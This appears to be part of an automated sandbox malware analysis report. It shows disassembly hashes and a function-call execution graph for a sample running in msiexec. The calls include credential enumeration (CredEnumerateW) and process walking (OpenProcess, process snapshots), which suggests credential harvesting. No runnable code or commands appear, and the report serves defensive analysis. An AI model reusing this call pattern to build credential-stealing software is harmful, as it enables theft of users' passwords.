                                                                                                          • Instruction Fuzzy Hash: D7110A76D00389AECB10CFA8D840BDDFBFDEF59214F104056E545E7212EA706B06D765
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 1FC72903
                                                                                                            • Part of subcall function 1FC735D2: RaiseException.KERNEL32(?,?,?,1FC72925,00000000,00000000,00000000,?,?,?,?,?,1FC72925,?,1FC821B8), ref: 1FC73632
                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 1FC72920
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                          • String ID: Unknown exception
                                                                                                          • API String ID: 3476068407-410509341
                                                                                                          • Opcode ID: 2c4127fc10513a5ed3264a188af90fb4c617cecba13244d10aca802fb39be17e
                                                                                                          • Instruction ID: ad0cc642d839f6678ff6f2e9005651dfc7700743abc1e3a9cf38d9855e0764f9
                                                                                                          • Opcode Fuzzy Hash: 2c4127fc10513a5ed3264a188af90fb4c617cecba13244d10aca802fb39be17e
                                                                                                          • Instruction Fuzzy Hash: 4BF0A43A90030DB78B04A6A5EC459DDB76E9B00660B904360E92496091FF31FA1DE990

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.6%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:1.3%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:76
                                                                                                          execution_graph 40146 441819 40149 430737 40146->40149 40148 441825 40150 430756 40149->40150 40162 43076d 40149->40162 40151 430774 40150->40151 40152 43075f 40150->40152 40164 43034a memcpy 40151->40164 40163 4169a7 11 API calls 40152->40163 40155 4307ce 40156 430819 memset 40155->40156 40165 415b2c 11 API calls 40155->40165 40156->40162 40157 43077e 40157->40155 40160 4307fa 40157->40160 40157->40162 40159 4307e9 40159->40156 40159->40162 40166 4169a7 11 API calls 40160->40166 40162->40148 40163->40162 40164->40157 40165->40159 40166->40162 37547 442ec6 19 API calls 37721 4152c6 malloc 37722 4152e2 37721->37722 37723 4152ef 37721->37723 37725 416760 11 API calls 37723->37725 37725->37722 37726 4466f4 37745 446904 37726->37745 37728 446700 GetModuleHandleA 37731 446710 __set_app_type __p__fmode __p__commode 37728->37731 37730 4467a4 37732 4467ac __setusermatherr 37730->37732 37733 4467b8 37730->37733 37731->37730 37732->37733 37746 4468f0 _controlfp 37733->37746 37735 4467bd _initterm __wgetmainargs _initterm 37736 44681e GetStartupInfoW 37735->37736 37737 446810 37735->37737 37739 446866 GetModuleHandleA 37736->37739 37747 41276d 37739->37747 37743 446896 exit 37744 44689d _cexit 37743->37744 37744->37737 37745->37728 37746->37735 37748 41277d 37747->37748 37790 4044a4 LoadLibraryW 37748->37790 37750 412785 37751 412789 37750->37751 37798 414b81 37750->37798 37751->37743 37751->37744 37754 4127c8 37804 412465 memset ??2@YAPAXI 37754->37804 37756 4127ea 37816 40ac21 37756->37816 37761 412813 37835 40dd07 memset 37761->37835 37762 412827 37840 40db69 memset 37762->37840 37765 412822 37862 4125b6 ??3@YAXPAX DeleteObject 37765->37862 37767 40ada2 _wcsicmp 37768 41283d 37767->37768 37768->37765 37771 412863 CoInitialize 37768->37771 37845 41268e 37768->37845 37770 412966 37863 40b1ab free free 37770->37863 37861 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37771->37861 37775 41296f 37864 40b633 37775->37864 37777 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37782 412957 CoUninitialize 37777->37782 37787 4128ca 37777->37787 37782->37765 37783 4128d0 TranslateAcceleratorW 37784 412941 GetMessageW 37783->37784 37783->37787 37784->37782 37784->37783 37785 412909 IsDialogMessageW 37785->37784 37785->37787 37786 4128fd IsDialogMessageW 37786->37784 37786->37785 37787->37783 37787->37785 37787->37786 37788 41292b TranslateMessage DispatchMessageW 37787->37788 37789 41291f IsDialogMessageW 37787->37789 37788->37784 37789->37784 37789->37788 37791 4044cf GetProcAddress 37790->37791 37795 4044f7 37790->37795 37792 4044e8 FreeLibrary 37791->37792 37794 4044df 37791->37794 37793 4044f3 37792->37793 37792->37795 37793->37795 37794->37792 37796 404507 MessageBoxW 37795->37796 37797 40451e 37795->37797 37796->37750 37797->37750 37799 414b8a 37798->37799 37800 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37798->37800 37868 40a804 memset 37799->37868 37800->37754 37803 414b9e GetProcAddress 37803->37800 37805 4124e0 37804->37805 37806 412505 ??2@YAPAXI 37805->37806 37807 41251c 37806->37807 37809 412521 37806->37809 37890 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37807->37890 37879 444722 37809->37879 37815 41259b wcscpy 37815->37756 37895 40b1ab free free 37816->37895 37820 40ad4b 37830 40ad76 37820->37830 37901 40a9ce 37820->37901 37821 40a9ce malloc memcpy free free 37826 40ac5c 37821->37826 37823 40acf0 37823->37826 37900 4099f4 malloc memcpy free 37823->37900 37824 40ace7 free 37824->37826 37826->37820 37826->37821 37826->37823 37826->37824 37826->37830 37899 40a8d0 7 API calls 37826->37899 37896 40aa04 37830->37896 37831 40ada2 37832 40adc9 37831->37832 37833 40adaa 37831->37833 37832->37761 37832->37762 37833->37832 37834 40adb3 _wcsicmp 37833->37834 37834->37832 37834->37833 37909 40dce0 37835->37909 37837 40dd3a GetModuleHandleW 37914 40dba7 37837->37914 37841 40dce0 3 API calls 37840->37841 37842 40db99 37841->37842 37986 40dae1 37842->37986 38000 402f3a 37845->38000 37847 412766 37847->37765 37847->37771 37848 4126d3 _wcsicmp 37849 4126a8 37848->37849 37849->37847 37849->37848 37851 41270a 37849->37851 38034 4125f8 7 API calls 37849->38034 37851->37847 38003 411ac5 37851->38003 37861->37777 37862->37770 37863->37775 37865 40b640 37864->37865 37866 40b639 free 37864->37866 37867 40b1ab free free 37865->37867 37866->37865 37867->37751 37869 40a83b GetSystemDirectoryW 37868->37869 37870 40a84c wcscpy 37868->37870 37869->37870 37875 409719 wcslen 37870->37875 37873 40a881 LoadLibraryW 37874 40a886 37873->37874 37874->37800 37874->37803 37876 409724 37875->37876 37877 409739 wcscat LoadLibraryW 37875->37877 37876->37877 37878 40972c wcscat 37876->37878 37877->37873 37877->37874 37878->37877 37880 444732 37879->37880 37881 444728 DeleteObject 37879->37881 37891 409cc3 37880->37891 37881->37880 37883 412551 37884 4010f9 37883->37884 37885 401130 37884->37885 37886 401134 GetModuleHandleW LoadIconW 37885->37886 37887 401107 wcsncat 37885->37887 37888 40a7be 37886->37888 37887->37885 37889 40a7d2 37888->37889 37889->37815 37889->37889 37890->37809 37894 409bfd memset wcscpy 37891->37894 37893 409cdb CreateFontIndirectW 37893->37883 37894->37893 37895->37826 37897 40aa14 37896->37897 37898 40aa0a free 37896->37898 37897->37831 37898->37897 37899->37826 37900->37823 37902 40a9e7 37901->37902 37903 40a9dc free 37901->37903 37908 4099f4 malloc memcpy free 37902->37908 37906 40a9f3 37903->37906 37905 40a9f2 37905->37906 37907 40a8d0 7 API calls 37906->37907 37907->37830 37908->37905 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37837 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37938 4447f4 37937->37938 37939 40dc1b 37938->37939 37940 444807 ??2@YAPAXI 37938->37940 37939->37921 37939->37922 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37947 4448a7 37947->37943 37947->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37939 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37765 37976->37947 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37989 37995 40db63 37988->37995 37997 40d65d GetPrivateProfileStringW 37989->37997 37991 40db3e 37998 40d65d GetPrivateProfileStringW 37991->37998 37993 40db4f 37999 40d65d GetPrivateProfileStringW 37993->37999 37995->37767 37996->37988 37997->37991 37998->37993 37999->37995 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37849 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38046 40d134 16 API calls 38041->38046 38043 40ec2e ??2@YAPAXI 38042->38043 38045 40ec65 38042->38045 38043->38045 38059 40ea7f 38045->38059 38046->38041 38048 402f49 38048->37849 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 free 38059->38060 38061 40ea88 38060->38061 38062 40aa04 free 38061->38062 38063 40ea90 38062->38063 38064 40aa04 free 38063->38064 38065 40ea98 38064->38065 38066 40aa04 free 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38171 403495 38170->38171 38171->38025 38172 4033a9 memset memcpy 38173 4033ec wcscmp 38172->38173 38174 40333c 38172->38174 38173->38174 38174->38167 38174->38172 38174->38173 38378 4028e7 11 API calls 38174->38378 38379 40f508 6 API calls 38174->38379 38176 403421 _wcsicmp 38176->38174 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38186 4455a8 memset 38184->38186 38267 4457f2 38184->38267 38464 403988 38186->38464 38192 4458aa 38194 44594a 38192->38194 38195 4458bb memset memset 38192->38195 38193 445672 38475 403fbe memset memset memset memset memset 38193->38475 38197 4459ed 38194->38197 38198 44595e memset memset 38194->38198 38200 414c2e 14 API calls 38195->38200 38208 445a00 memset memset 38197->38208 38209 445b22 38197->38209 38204 414c2e 14 API calls 38198->38204 38199 4455e5 38199->38193 38212 44560f 38199->38212 38205 4458f9 38200->38205 38201 44557a 38206 44558c 38201->38206 38660 4136c0 CoTaskMemFree 38201->38660 38202 445854 38202->38192 38590 403c9c memset memset memset memset memset 38202->38590 38210 44599c 38204->38210 38211 40b2cc 27 API calls 38205->38211 38448 444b06 38206->38448 38613 414c2e 38208->38613 38215 445bca 38209->38215 38216 445b38 memset memset memset 38209->38216 38222 40b2cc 27 API calls 38210->38222 38223 445909 38211->38223 38225 4087b3 337 API calls 38212->38225 38214 445849 38676 40b1ab free free 38214->38676 38224 445c8b memset memset 38215->38224 38280 445cf0 38215->38280 38228 445bd4 38216->38228 38229 445b98 38216->38229 38230 4459ac 38222->38230 38239 409d1f 6 API calls 38223->38239 38231 414c2e 14 API calls 38224->38231 38240 445621 38225->38240 38226 445585 38661 41366b FreeLibrary 38226->38661 38227 44589f 38677 40b1ab free free 38227->38677 38237 414c2e 14 API calls 38228->38237 38229->38228 38233 445ba2 38229->38233 38242 409d1f 6 API calls 38230->38242 38243 445cc9 38231->38243 38747 4099c6 wcslen 38233->38747 38234 4456b2 38664 40b1ab free free 38234->38664 38235 40b2cc 27 API calls 38246 445a4f 38235->38246 38248 445be2 38237->38248 38238 403335 38377 4452e5 45 API calls 38238->38377 38251 445919 38239->38251 38662 4454bf 20 API calls 38240->38662 38241 445823 38241->38214 38260 4087b3 337 API calls 38241->38260 38253 4459bc 38242->38253 38254 409d1f 6 API calls 38243->38254 38244 445879 38244->38227 38264 4087b3 337 API calls 38244->38264 38626 409d1f wcslen wcslen 38246->38626 38258 40b2cc 27 API calls 38248->38258 38249 445d3d 38278 40b2cc 27 API calls 38249->38278 38250 445d88 memset memset memset 38252 414c2e 14 API calls 38250->38252 38678 409b98 GetFileAttributesW 38251->38678 38261 445dde 38252->38261 38743 409b98 GetFileAttributesW 38253->38743 38263 445ce1 38254->38263 38255 445bb3 38750 445403 memset 38255->38750 38256 445680 38256->38234 38498 4087b3 memset 38256->38498 38268 445bf3 38258->38268 38260->38241 38271 40b2cc 27 API calls 38261->38271 38767 409b98 GetFileAttributesW 38263->38767 38264->38244 38267->38202 38567 403e2d memset memset memset memset memset 38267->38567 38277 409d1f 6 API calls 38268->38277 38269 445928 38269->38194 38679 40b6ef 38269->38679 38279 445def 38271->38279 38272 4459cb 38272->38197 38290 40b6ef 249 API calls 38272->38290 38276 40b2cc 27 API calls 38282 445a94 38276->38282 38284 445c07 38277->38284 38285 445d54 _wcsicmp 38278->38285 38288 409d1f 6 API calls 38279->38288 38280->38238 38280->38249 38280->38250 38281 445389 255 API calls 38281->38215 38631 40ae18 38282->38631 38283 44566d 38283->38267 38549 413d4c 38283->38549 38293 445389 255 API calls 38284->38293 38294 445d71 38285->38294 38355 445d67 38285->38355 38287 445665 38663 40b1ab free free 38287->38663 38296 445e03 38288->38296 38290->38197 38298 445c17 38293->38298 38768 445093 23 API calls 38294->38768 38295 44563c 38295->38287 38300 4087b3 337 API calls 38295->38300 38769 409b98 GetFileAttributesW 38296->38769 38297 4456d8 38303 40b2cc 27 API calls 38297->38303 38304 40b2cc 27 API calls 38298->38304 38300->38295 38302 40b6ef 249 API calls 38302->38238 38308 4456e2 38303->38308 38309 445c23 38304->38309 38305 445d83 38305->38238 38307 445e12 38313 445e6b 38307->38313 38317 40b2cc 27 API calls 38307->38317 38665 413fa6 _wcsicmp _wcsicmp 38308->38665 38311 409d1f 6 API calls 38309->38311 38315 445c37 38311->38315 38312 445b17 38744 40aebe 38312->38744 38771 445093 23 API calls 38313->38771 38314 4456eb 38320 4456fd memset memset memset memset 38314->38320 38321 4457ea 38314->38321 38322 445389 255 API calls 38315->38322 38324 445e33 38317->38324 38666 409c70 wcscpy wcsrchr 38320->38666 38669 413d29 38321->38669 38323 445c47 38322->38323 38329 40b2cc 27 API calls 38323->38329 38330 409d1f 6 API calls 38324->38330 38326 445e7e 38331 445f67 38326->38331 38334 445c53 38329->38334 38335 445e47 38330->38335 38336 40b2cc 27 API calls 38331->38336 38332 445ab2 memset 38337 40b2cc 27 API calls 38332->38337 38333 409c70 2 API calls 38338 44577e 38333->38338 38339 409d1f 6 API calls 38334->38339 38770 409b98 GetFileAttributesW 38335->38770 38341 445f73 38336->38341 38342 445aa1 38337->38342 38343 409c70 2 API calls 38338->38343 38344 445c67 38339->38344 38346 409d1f 6 API calls 38341->38346 38342->38312 38342->38332 38347 409d1f 6 API calls 38342->38347 38638 40add4 38342->38638 38643 445389 38342->38643 38652 40ae51 38342->38652 38348 44578d 38343->38348 38349 445389 255 API calls 38344->38349 38345 445e56 38345->38313 38352 445e83 memset 38345->38352 38350 445f87 38346->38350 38347->38342 38348->38321 38354 40b2cc 27 API calls 38348->38354 38349->38215 38774 409b98 GetFileAttributesW 38350->38774 38356 40b2cc 27 API calls 38352->38356 38357 4457a8 38354->38357 38355->38238 38355->38302 38358 445eab 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 4457b8 38359->38361 38362 445ebf 38360->38362 38668 409b98 GetFileAttributesW 38361->38668 38364 40ae18 9 API calls 38362->38364 38372 445ef5 38364->38372 38365 4457c7 38365->38321 38367 4087b3 337 API calls 38365->38367 38366 40ae51 9 API calls 38366->38372 38367->38321 38368 445f5c 38369 40aebe FindClose 38368->38369 38369->38331 38370 40add4 2 API calls 38370->38372 38371 40b2cc 27 API calls 38371->38372 38372->38366 38372->38368 38372->38370 38372->38371 38373 409d1f 6 API calls 38372->38373 38375 445f3a 38372->38375 38772 409b98 GetFileAttributesW 38372->38772 38373->38372 38773 445093 23 API calls 38375->38773 38377->38174 38378->38176 38379->38174 38380->38169 38382 40c775 38381->38382 38775 40b1ab free free 38382->38775 38384 40c788 38776 40b1ab free free 38384->38776 38386 40c790 38777 40b1ab free free 38386->38777 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38778 40c274 memset 38390->38778 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38807 40c3c3 38398->38807 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38833 4053fe 39 API calls 38403->38833 38406 40c813 _wcslwr 38831 40c634 49 API calls 38406->38831 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38830 40a706 wcslen memcpy 38409->38830 38832 40c634 49 API calls 38409->38832 39018 404363 38411->39018 38414 40bf5d 39038 40440c 38414->39038 38416 40bdee 38416->38414 38419 40b2cc 27 API calls 38416->38419 38417 40bddf CredEnumerateW 38417->38416 38420 40be02 wcslen 38419->38420 38420->38414 38427 40be1e 38420->38427 38421 40be26 wcsncmp 38421->38427 38424 40be7d memset 38425 40bea7 memcpy 38424->38425 38424->38427 38426 40bf11 wcschr 38425->38426 38425->38427 38426->38427 38427->38414 38427->38421 38427->38424 38427->38425 38427->38426 38428 40b2cc 27 API calls 38427->38428 38430 40bf43 LocalFree 38427->38430 39041 40bd5d 28 API calls 38427->39041 39042 404423 38427->39042 38429 40bef6 _wcsnicmp 38428->38429 38429->38426 38429->38427 38430->38427 38431 4135f7 39055 4135e0 38431->39055 38434 40b2cc 27 API calls 38435 41360d 38434->38435 38436 40a804 8 API calls 38435->38436 38437 413613 38436->38437 38438 41361b 38437->38438 38439 41363e 38437->38439 38440 40b273 27 API calls 38438->38440 38441 4135e0 FreeLibrary 38439->38441 38442 413625 GetProcAddress 38440->38442 38443 413643 38441->38443 38442->38439 38444 413648 38442->38444 38443->38201 38445 413658 38444->38445 38446 4135e0 FreeLibrary 38444->38446 38445->38201 38447 413666 38446->38447 38447->38201 39058 4449b9 38448->39058 38451 4449b9 42 API calls 38453 444b4b 38451->38453 38452 444c15 38455 4449b9 42 API calls 38452->38455 38453->38452 39079 444972 GetVersionExW 38453->39079 38456 444c1f 38455->38456 38456->38184 38457 444b99 memcmp 38462 444b8c 38457->38462 38458 444c0b 39083 444a85 42 API calls 38458->39083 38462->38457 38462->38458 39080 444aa5 42 API calls 38462->39080 39081 40a7a0 GetVersionExW 38462->39081 39082 444a85 42 API calls 38462->39082 38465 40399d 38464->38465 39084 403a16 38465->39084 38467 403a09 39098 40b1ab free free 38467->39098 38469 403a12 wcsrchr 38469->38199 38470 4039a3 38470->38467 38473 4039f4 38470->38473 39095 40a02c CreateFileW 38470->39095 38473->38467 38474 4099c6 2 API calls 38473->38474 38474->38467 38476 414c2e 14 API calls 38475->38476 38477 404048 38476->38477 38478 414c2e 14 API calls 38477->38478 38479 404056 38478->38479 38480 409d1f 6 API calls 38479->38480 38481 404073 38480->38481 38482 409d1f 6 API calls 38481->38482 38483 40408e 38482->38483 38484 409d1f 6 API calls 38483->38484 38485 4040a6 38484->38485 38486 403af5 20 API calls 38485->38486 38487 4040ba 38486->38487 38488 403af5 20 API calls 38487->38488 38489 4040cb 38488->38489 39125 40414f memset 38489->39125 38491 404140 39139 40b1ab free free 38491->39139 38493 4040ec memset 38496 4040e0 38493->38496 38494 404148 38494->38256 38495 4099c6 2 API calls 38495->38496 38496->38491 38496->38493 38496->38495 38497 40a8ab 9 API calls 38496->38497 38497->38496 39152 40a6e6 WideCharToMultiByte 38498->39152 38500 4087ed 39153 4095d9 memset 38500->39153 38503 408809 memset memset memset memset memset 38504 40b2cc 27 API calls 38503->38504 38505 4088a1 38504->38505 38506 409d1f 6 API calls 38505->38506 38507 4088b1 38506->38507 38508 40b2cc 27 API calls 38507->38508 38509 4088c0 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 4088d0 38510->38511 38512 40b2cc 27 API calls 38511->38512 38513 4088df 38512->38513 38514 409d1f 6 API calls 38513->38514 38515 4088ef 38514->38515 38516 40b2cc 27 API calls 38515->38516 38517 4088fe 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 40890e 38518->38519 38520 40b2cc 27 API calls 38519->38520 38521 40891d 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 40892d 38522->38523 39172 409b98 GetFileAttributesW 38523->39172 38525 40893e 38526 408943 38525->38526 38527 408958 38525->38527 39173 407fdf 75 API calls 38526->39173 39174 409b98 GetFileAttributesW 38527->39174 38530 408953 38530->38256 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39175 4082c7 198 API calls 38532->39175 39176 409b98 GetFileAttributesW 38533->39176 38536 408987 38537 4089a1 38536->38537 38538 40898c 38536->38538 39178 409b98 GetFileAttributesW 38537->39178 39177 408560 29 API calls 38538->39177 38541 4089ad 38550 40b633 free 38549->38550 38551 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38550->38551 38552 413f00 Process32NextW 38551->38552 38553 413da5 OpenProcess 38552->38553 38554 413f17 CloseHandle 38552->38554 38555 413eb0 38553->38555 38556 413df3 memset 38553->38556 38554->38297 38555->38552 38558 413ebf free 38555->38558 38560 413ec8 38555->38560 39442 413f27 38556->39442 38558->38555 38560->38555 39469 4099f4 malloc memcpy free 38560->39469 38561 413e37 GetModuleHandleW 38563 413e46 GetProcAddress 38561->38563 38564 413e1f 38561->38564 38563->38564 38564->38561 39447 413959 38564->39447 39463 413ca4 38564->39463 38566 413ea2 CloseHandle 38566->38555 38568 414c2e 14 API calls 38567->38568 38569 403eb7 38568->38569 38570 414c2e 14 API calls 38569->38570 38571 403ec5 38570->38571 38572 409d1f 6 API calls 38571->38572 38573 403ee2 38572->38573 38574 409d1f 6 API calls 38573->38574 38575 403efd 38574->38575 38576 409d1f 6 API calls 38575->38576 38577 403f15 38576->38577 38578 403af5 20 API calls 38577->38578 38579 403f29 38578->38579 38580 403af5 20 API calls 38579->38580 38581 403f3a 38580->38581 38582 40414f 33 API calls 38581->38582 38588 403f4f 38582->38588 38583 403faf 39478 40b1ab free free 38583->39478 38585 403f5b memset 38585->38588 38586 403fb7 38586->38241 38587 4099c6 2 API calls 38587->38588 38588->38583 38588->38585 38588->38587 38589 40a8ab 9 API calls 38588->38589 38589->38588 38591 414c2e 14 API calls 38590->38591 38592 403d26 38591->38592 38593 414c2e 14 API calls 38592->38593 38594 403d34 38593->38594 38595 409d1f 6 API calls 38594->38595 38596 403d51 38595->38596 38597 409d1f 6 API calls 38596->38597 38598 403d6c 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 403d84 38599->38600 38601 403af5 20 API calls 38600->38601 38602 403d98 38601->38602 38603 403af5 20 API calls 38602->38603 38604 403da9 38603->38604 38605 40414f 33 API calls 38604->38605 38606 403dbe 38605->38606 38607 403e1e 38606->38607 38608 403dca memset 38606->38608 38611 4099c6 2 API calls 38606->38611 38612 40a8ab 9 API calls 38606->38612 39479 40b1ab free free 38607->39479 38608->38606 38610 403e26 38610->38244 38611->38606 38612->38606 38614 414b81 9 API calls 38613->38614 38615 414c40 38614->38615 38616 414c73 memset 38615->38616 39480 409cea 38615->39480 38620 414c94 38616->38620 38619 414c64 38619->38235 38621 414cf4 wcscpy 38620->38621 39483 414bb0 wcscpy 38620->39483 38621->38619 38623 414cd2 39484 4145ac RegQueryValueExW 38623->39484 38625 414ce9 38625->38621 38627 409d62 38626->38627 38628 409d43 wcscpy 38626->38628 38627->38276 38629 409719 2 API calls 38628->38629 38630 409d51 wcscat 38629->38630 38630->38627 38632 40aebe FindClose 38631->38632 38633 40ae21 38632->38633 38634 4099c6 2 API calls 38633->38634 38635 40ae35 38634->38635 38636 